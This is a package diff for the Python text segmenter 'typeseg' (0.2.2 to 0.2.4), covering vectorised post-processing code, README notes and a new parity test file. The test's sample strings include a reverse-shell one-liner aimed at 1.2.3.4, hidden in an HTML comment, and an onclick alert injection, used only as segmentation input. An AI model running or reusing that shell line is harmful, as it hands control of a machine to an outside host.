typeseg 0.2.2__tar.gz → 0.2.4__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- {typeseg-0.2.2 → typeseg-0.2.4}/PKG-INFO +14 -1
- {typeseg-0.2.2 → typeseg-0.2.4}/README.md +13 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/pyproject.toml +1 -1
- typeseg-0.2.4/tests/test_postprocess_parity.py +139 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_postprocess.py +53 -46
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/PKG-INFO +14 -1
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/SOURCES.txt +1 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/LICENSE +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/setup.cfg +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_cupy_parity.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_distribution.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_postprocess_perf.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__init__.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__main__.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cli.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_color.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cupy_backend.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_mamba_kernel.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_numpy_backend.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_onnx_backend.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_options.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_runtime.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_segmentation.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_tokenize.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.npz +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.onnx +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/manifest.json +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.npz +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.onnx +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/dependency_links.txt +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/entry_points.txt +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/requires.txt +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/top_level.txt +0 -0
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: typeseg
|
|
3
|
-
Version: 0.2.
|
|
3
|
+
Version: 0.2.4
|
|
4
4
|
Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
|
|
5
5
|
Author: Martin Dallinger
|
|
6
6
|
License-Expression: Apache-2.0
|
|
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
|
|
|
249
249
|
the interactive viewer also applies. The viewer has further heuristics
|
|
250
250
|
(`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
|
|
251
251
|
`viewers/core.py` for those.
|
|
252
|
+
|
|
253
|
+
These passes are cheap, but on long inputs they run on the CPU and can outweigh the
|
|
254
|
+
model's own forward pass — so the highest throughput is with post-processing off,
|
|
255
|
+
exposing the raw per-character argmax:
|
|
256
|
+
|
|
257
|
+
```python
|
|
258
|
+
raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
|
|
259
|
+
min_run_normalize=False, paired_delimiter_fill=False)
|
|
260
|
+
result = precise(text, raw)
|
|
261
|
+
```
|
|
262
|
+
|
|
263
|
+
The trade-off is noisier segments (single-character runs, frayed boundaries); the
|
|
264
|
+
default keeps post-processing on for cleaner, deployment-style output.
|
|
@@ -226,3 +226,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
|
|
|
226
226
|
the interactive viewer also applies. The viewer has further heuristics
|
|
227
227
|
(`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
|
|
228
228
|
`viewers/core.py` for those.
|
|
229
|
+
|
|
230
|
+
These passes are cheap, but on long inputs they run on the CPU and can outweigh the
|
|
231
|
+
model's own forward pass — so the highest throughput is with post-processing off,
|
|
232
|
+
exposing the raw per-character argmax:
|
|
233
|
+
|
|
234
|
+
```python
|
|
235
|
+
raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
|
|
236
|
+
min_run_normalize=False, paired_delimiter_fill=False)
|
|
237
|
+
result = precise(text, raw)
|
|
238
|
+
```
|
|
239
|
+
|
|
240
|
+
The trade-off is noisier segments (single-character runs, frayed boundaries); the
|
|
241
|
+
default keeps post-processing on for cleaner, deployment-style output.
|
|
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
|
|
|
4
4
|
|
|
5
5
|
[project]
|
|
6
6
|
name = "typeseg"
|
|
7
|
-
version = "0.2.
|
|
7
|
+
version = "0.2.4"
|
|
8
8
|
description = "Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba)."
|
|
9
9
|
readme = "README.md"
|
|
10
10
|
license = "Apache-2.0"
|
|
@@ -0,0 +1,139 @@
|
|
|
1
|
+
"""Regression guards for the vectorised post-processing helpers.
|
|
2
|
+
|
|
3
|
+
The hot helpers (``_runs``, ``relabel_whitespace``, ``confidence_gate``,
|
|
4
|
+
``build_segments``) were rewritten from per-character Python loops to vectorised
|
|
5
|
+
numpy. Each must stay bit-identical to a naive reference. We also run the full
|
|
6
|
+
pipeline on representative samples *looped* x1/x4/x16 so inputs cross the
|
|
7
|
+
1536-byte U-Net window (multi-window seams) and post-processing runs over long
|
|
8
|
+
sequences -- the regime where the optimisations matter.
|
|
9
|
+
"""
|
|
10
|
+
import random
|
|
11
|
+
|
|
12
|
+
import numpy as np
|
|
13
|
+
import pytest
|
|
14
|
+
|
|
15
|
+
import typeseg
|
|
16
|
+
from typeseg import _postprocess as pp
|
|
17
|
+
|
|
18
|
+
|
|
19
|
+
# --- naive references (the pre-optimisation implementations) ---------------
|
|
20
|
+
|
|
21
|
+
def _runs_naive(labels):
|
|
22
|
+
runs = []
|
|
23
|
+
if not labels:
|
|
24
|
+
return runs
|
|
25
|
+
start = 0
|
|
26
|
+
for i in range(1, len(labels) + 1):
|
|
27
|
+
if i == len(labels) or labels[i] != labels[start]:
|
|
28
|
+
runs.append((start, i, labels[start]))
|
|
29
|
+
start = i
|
|
30
|
+
return runs
|
|
31
|
+
|
|
32
|
+
|
|
33
|
+
def _relabel_naive(text, labels):
|
|
34
|
+
n = len(text)
|
|
35
|
+
if n == 0:
|
|
36
|
+
return labels
|
|
37
|
+
is_ws = [c in pp._WHITESPACE for c in text]
|
|
38
|
+
if not any(is_ws):
|
|
39
|
+
return labels
|
|
40
|
+
left, right = [-1] * n, [-1] * n
|
|
41
|
+
last = -1
|
|
42
|
+
for i in range(n):
|
|
43
|
+
if not is_ws[i]:
|
|
44
|
+
last = labels[i]
|
|
45
|
+
left[i] = last
|
|
46
|
+
last = -1
|
|
47
|
+
for i in range(n - 1, -1, -1):
|
|
48
|
+
if not is_ws[i]:
|
|
49
|
+
last = labels[i]
|
|
50
|
+
right[i] = last
|
|
51
|
+
out = list(labels)
|
|
52
|
+
for i in range(n):
|
|
53
|
+
if is_ws[i]:
|
|
54
|
+
if left[i] != -1:
|
|
55
|
+
out[i] = left[i]
|
|
56
|
+
elif right[i] != -1:
|
|
57
|
+
out[i] = right[i]
|
|
58
|
+
return out
|
|
59
|
+
|
|
60
|
+
|
|
61
|
+
def _gate_naive(char_probs, labels, threshold, other_index):
|
|
62
|
+
if threshold <= 0.0 or char_probs.size == 0:
|
|
63
|
+
return labels
|
|
64
|
+
maxp = char_probs.max(axis=1)
|
|
65
|
+
return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
|
|
66
|
+
|
|
67
|
+
|
|
68
|
+
# --- helper parity ---------------------------------------------------------
|
|
69
|
+
|
|
70
|
+
def test_runs_matches_naive():
|
|
71
|
+
rng = random.Random(0)
|
|
72
|
+
for _ in range(500):
|
|
73
|
+
n = rng.randint(0, 300)
|
|
74
|
+
labels = [rng.randint(0, 4) for _ in range(n)]
|
|
75
|
+
assert pp._runs(labels) == _runs_naive(labels)
|
|
76
|
+
|
|
77
|
+
|
|
78
|
+
def test_relabel_whitespace_matches_naive():
|
|
79
|
+
rng = random.Random(1)
|
|
80
|
+
alphabets = ["ab \t\n", "x ", " \t\n\r", "abcde "]
|
|
81
|
+
for _ in range(2000):
|
|
82
|
+
n = rng.randint(0, 60)
|
|
83
|
+
alpha = rng.choice(alphabets)
|
|
84
|
+
text = "".join(rng.choice(alpha) for _ in range(n))
|
|
85
|
+
labels = [rng.randint(0, 6) for _ in range(n)]
|
|
86
|
+
assert pp.relabel_whitespace(text, list(labels)) == _relabel_naive(text, list(labels))
|
|
87
|
+
|
|
88
|
+
|
|
89
|
+
def test_confidence_gate_matches_naive():
|
|
90
|
+
rng = np.random.default_rng(2)
|
|
91
|
+
for _ in range(200):
|
|
92
|
+
n = int(rng.integers(0, 400))
|
|
93
|
+
cp = rng.random((n, 35)).astype(np.float32)
|
|
94
|
+
labels = [int(x) for x in rng.integers(0, 35, n)]
|
|
95
|
+
for thr in (0.0, 0.1, 0.3, 0.9):
|
|
96
|
+
got = pp.confidence_gate(cp, list(labels), thr, 35)
|
|
97
|
+
assert got == _gate_naive(cp, list(labels), thr, 35)
|
|
98
|
+
if thr > 0 and n > 0: # gated path returns Python ints (not numpy scalars)
|
|
99
|
+
assert all(isinstance(x, int) for x in got)
|
|
100
|
+
|
|
101
|
+
|
|
102
|
+
# --- full pipeline on looped samples (multi-window) ------------------------
|
|
103
|
+
|
|
104
|
+
SAMPLES = [
|
|
105
|
+
'.btn { color: #3498db; }\nconst f = (x) => x + 1;\n<div onclick="alert(1)">hi</div>\n'
|
|
106
|
+
"UPDATE life SET status = 'ok' WHERE n > 9;\n<!-- sh -i >& /dev/udp/1.2.3.4/9 0>&1 -->\n",
|
|
107
|
+
'{\n "users": [{"id": 1, "name": "Alice"}, {"id": 2, "name": "Bob"}],\n "page": 1\n}',
|
|
108
|
+
"# My Project\n\n```\npip install x\n```\n\nA tool that does `things`. MIT.\n",
|
|
109
|
+
"FROM python:3.12-slim\nRUN apt-get update && rm -rf /var/lib/apt/lists/*\nCMD [\"app\"]\n",
|
|
110
|
+
]
|
|
111
|
+
|
|
112
|
+
|
|
113
|
+
@pytest.mark.parametrize("k", [1, 4, 16])
|
|
114
|
+
@pytest.mark.parametrize("fn", [typeseg.fast, typeseg.precise])
|
|
115
|
+
def test_pipeline_consistent_on_looped_samples(fn, k):
|
|
116
|
+
for s in SAMPLES:
|
|
117
|
+
text = s * k
|
|
118
|
+
r = fn(text)
|
|
119
|
+
n = len(text)
|
|
120
|
+
# per-char arrays line up with the text length
|
|
121
|
+
assert len(r.char_labels) == n
|
|
122
|
+
assert len(r.char_confidence) == n
|
|
123
|
+
assert r.char_probs.shape == (n, len(r.labels))
|
|
124
|
+
# segments tile the whole text contiguously, no gaps/overlaps
|
|
125
|
+
assert r.segments[0].start == 0
|
|
126
|
+
assert r.segments[-1].end == n
|
|
127
|
+
for a, b in zip(r.segments, r.segments[1:]):
|
|
128
|
+
assert a.end == b.start
|
|
129
|
+
# each segment's label matches the per-char labels it covers
|
|
130
|
+
for seg in r.segments:
|
|
131
|
+
assert all(lab == seg.label for lab in r.char_labels[seg.start:seg.end])
|
|
132
|
+
|
|
133
|
+
|
|
134
|
+
def test_pipeline_deterministic_when_looped():
|
|
135
|
+
for fn in (typeseg.fast, typeseg.precise):
|
|
136
|
+
text = SAMPLES[0] * 8
|
|
137
|
+
a, b = fn(text), fn(text)
|
|
138
|
+
assert a.char_labels == b.char_labels
|
|
139
|
+
assert [s.label for s in a.segments] == [s.label for s in b.segments]
|
|
@@ -17,15 +17,18 @@ _WHITESPACE = set(" \t\n\r\f\v")
|
|
|
17
17
|
|
|
18
18
|
|
|
19
19
|
def _runs(labels: List[int]) -> List[Tuple[int, int, int]]:
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
20
|
+
# Contiguous equal-label spans. Vectorised: the change points are where adjacent
|
|
21
|
+
# labels differ. This is called once per post-processing pass over the full
|
|
22
|
+
# sequence, so the pure-Python scan (with its per-iteration len()) dominated the
|
|
23
|
+
# pipeline; np.diff finds the boundaries in C. Output is identical.
|
|
24
|
+
n = len(labels)
|
|
25
|
+
if n == 0:
|
|
26
|
+
return []
|
|
27
|
+
arr = np.asarray(labels)
|
|
28
|
+
cuts = np.flatnonzero(arr[1:] != arr[:-1]) + 1
|
|
29
|
+
starts = [0, *cuts.tolist()]
|
|
30
|
+
ends = [*cuts.tolist(), n]
|
|
31
|
+
return [(s, e, int(labels[s])) for s, e in zip(starts, ends)]
|
|
29
32
|
|
|
30
33
|
|
|
31
34
|
def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
|
|
@@ -34,29 +37,21 @@ def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
|
|
|
34
37
|
n = len(text)
|
|
35
38
|
if n == 0:
|
|
36
39
|
return labels
|
|
37
|
-
|
|
38
|
-
if not any(
|
|
40
|
+
ws = np.fromiter((c in _WHITESPACE for c in text), dtype=bool, count=n)
|
|
41
|
+
if not ws.any():
|
|
39
42
|
return labels
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
out = list(labels)
|
|
53
|
-
for i in range(n):
|
|
54
|
-
if is_ws[i]:
|
|
55
|
-
if left[i] != -1:
|
|
56
|
-
out[i] = left[i]
|
|
57
|
-
elif right[i] != -1:
|
|
58
|
-
out[i] = right[i]
|
|
59
|
-
return out
|
|
43
|
+
labels_arr = np.asarray(labels)
|
|
44
|
+
pos = np.arange(n)
|
|
45
|
+
# left_src[i] = index of nearest non-ws char at <= i (-1 if none): running max of
|
|
46
|
+
# the non-ws indices. right_src[i] = nearest non-ws at >= i (n if none): reverse
|
|
47
|
+
# running min. A whitespace char takes its left host's label, else the right's.
|
|
48
|
+
left_src = np.maximum.accumulate(np.where(ws, -1, pos))
|
|
49
|
+
right_src = np.minimum.accumulate(np.where(ws, n, pos)[::-1])[::-1]
|
|
50
|
+
src = np.where(left_src >= 0, left_src, right_src) # prefer left, fall back right
|
|
51
|
+
take = ws & (src < n) # leave ws with no host at all
|
|
52
|
+
out = labels_arr.copy()
|
|
53
|
+
out[take] = labels_arr[src[take]]
|
|
54
|
+
return out.tolist()
|
|
60
55
|
|
|
61
56
|
|
|
62
57
|
def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float, other_index: int) -> List[int]:
|
|
@@ -64,7 +59,7 @@ def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float,
|
|
|
64
59
|
if threshold <= 0.0 or char_probs.size == 0:
|
|
65
60
|
return labels
|
|
66
61
|
maxp = char_probs.max(axis=1)
|
|
67
|
-
return
|
|
62
|
+
return np.where(maxp < threshold, other_index, np.asarray(labels, dtype=np.intp)).tolist()
|
|
68
63
|
|
|
69
64
|
|
|
70
65
|
def normalize_short_runs(labels: List[int], char_probs: np.ndarray, min_run_chars: int,
|
|
@@ -424,16 +419,22 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
|
|
|
424
419
|
if cur_score is None:
|
|
425
420
|
cur_score = _boundary_local_score(text, cur_start) + _boundary_local_score(text, cur_end)
|
|
426
421
|
best_start, best_end, best_score = cur_start, cur_end, cur_score
|
|
422
|
+
n_text = len(text)
|
|
427
423
|
for ls in range(-max_shift, max_shift + 1):
|
|
428
424
|
cs = cur_start + ls
|
|
429
425
|
if cs < left_run[0] or cs >= cur_end:
|
|
430
426
|
continue
|
|
427
|
+
# The wrap is valid only if text[cs-1] opens a pair; its required
|
|
428
|
+
# closing char is fixed by the left shift, so resolve it once here
|
|
429
|
+
# instead of calling _matching_wrap for every (ls, rs) combination.
|
|
430
|
+
close_needed = _WRAP_OPEN_TO_CLOSE.get(text[cs - 1]) if cs > 0 else None
|
|
431
|
+
if close_needed is None:
|
|
432
|
+
continue
|
|
431
433
|
for rs in range(-max_shift, max_shift + 1):
|
|
432
434
|
ce = cur_end + rs
|
|
433
435
|
if ce <= cs or ce > right_run[1] or (cs == cur_start and ce == cur_end):
|
|
434
436
|
continue
|
|
435
|
-
if
|
|
436
|
-
text[ce] if ce < len(text) else ""):
|
|
437
|
+
if (text[ce] if ce < n_text else "") != close_needed:
|
|
437
438
|
continue
|
|
438
439
|
sc = _score_wrapped(text, char_probs, left_run, mid_run, right_run, cs, ce)
|
|
439
440
|
if sc is not None and sc > best_score + 1e-6:
|
|
@@ -452,21 +453,27 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
|
|
|
452
453
|
def build_segments(text: str, labels: List[int], char_probs: np.ndarray,
|
|
453
454
|
label_names: List[str], other_index: int, other_label: str) -> Tuple[List[Segment], List[str], List[float]]:
|
|
454
455
|
n = len(text)
|
|
455
|
-
|
|
456
|
-
|
|
457
|
-
|
|
458
|
-
|
|
459
|
-
|
|
460
|
-
|
|
461
|
-
|
|
462
|
-
|
|
463
|
-
|
|
464
|
-
|
|
465
|
-
|
|
456
|
+
# Per-char confidence, vectorised. `other` (no probability column) scores
|
|
457
|
+
# 1 - max(known); every other label scores its own column. The old per-char
|
|
458
|
+
# `char_probs[i].max()` Python loop did n separate numpy reductions and was the
|
|
459
|
+
# bottleneck of the whole pipeline -- this is the same result in two reductions.
|
|
460
|
+
if char_probs.size:
|
|
461
|
+
lab_arr = np.asarray(labels, dtype=np.intp)
|
|
462
|
+
is_other = lab_arr == other_index
|
|
463
|
+
known_max = char_probs.max(axis=1) # (n,)
|
|
464
|
+
safe_lab = np.where(is_other, 0, lab_arr) # avoid OOB at other_index
|
|
465
|
+
picked = char_probs[np.arange(n), safe_lab] # (n,) chosen-label prob
|
|
466
|
+
conf_arr = np.where(is_other, 1.0 - known_max, picked).astype(np.float64)
|
|
467
|
+
else:
|
|
468
|
+
conf_arr = np.zeros(n, dtype=np.float64)
|
|
469
|
+
char_conf: List[float] = conf_arr.tolist()
|
|
470
|
+
char_label_names: List[str] = [
|
|
471
|
+
other_label if lab == other_index else label_names[lab] for lab in labels
|
|
472
|
+
]
|
|
466
473
|
|
|
467
474
|
segments: List[Segment] = []
|
|
468
475
|
for s, e, lab in _runs(labels):
|
|
469
476
|
name = other_label if lab == other_index else label_names[lab]
|
|
470
|
-
conf = float(
|
|
477
|
+
conf = float(conf_arr[s:e].mean()) if e > s else 0.0
|
|
471
478
|
segments.append(Segment(start=s, end=e, label=name, confidence=conf, text=text[s:e]))
|
|
472
479
|
return segments, char_label_names, char_conf
|
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: typeseg
|
|
3
|
-
Version: 0.2.
|
|
3
|
+
Version: 0.2.4
|
|
4
4
|
Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
|
|
5
5
|
Author: Martin Dallinger
|
|
6
6
|
License-Expression: Apache-2.0
|
|
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
|
|
|
249
249
|
the interactive viewer also applies. The viewer has further heuristics
|
|
250
250
|
(`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
|
|
251
251
|
`viewers/core.py` for those.
|
|
252
|
+
|
|
253
|
+
These passes are cheap, but on long inputs they run on the CPU and can outweigh the
|
|
254
|
+
model's own forward pass — so the highest throughput is with post-processing off,
|
|
255
|
+
exposing the raw per-character argmax:
|
|
256
|
+
|
|
257
|
+
```python
|
|
258
|
+
raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
|
|
259
|
+
min_run_normalize=False, paired_delimiter_fill=False)
|
|
260
|
+
result = precise(text, raw)
|
|
261
|
+
```
|
|
262
|
+
|
|
263
|
+
The trade-off is noisier segments (single-character runs, frayed boundaries); the
|
|
264
|
+
default keeps post-processing on for cleaner, deployment-style output.
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|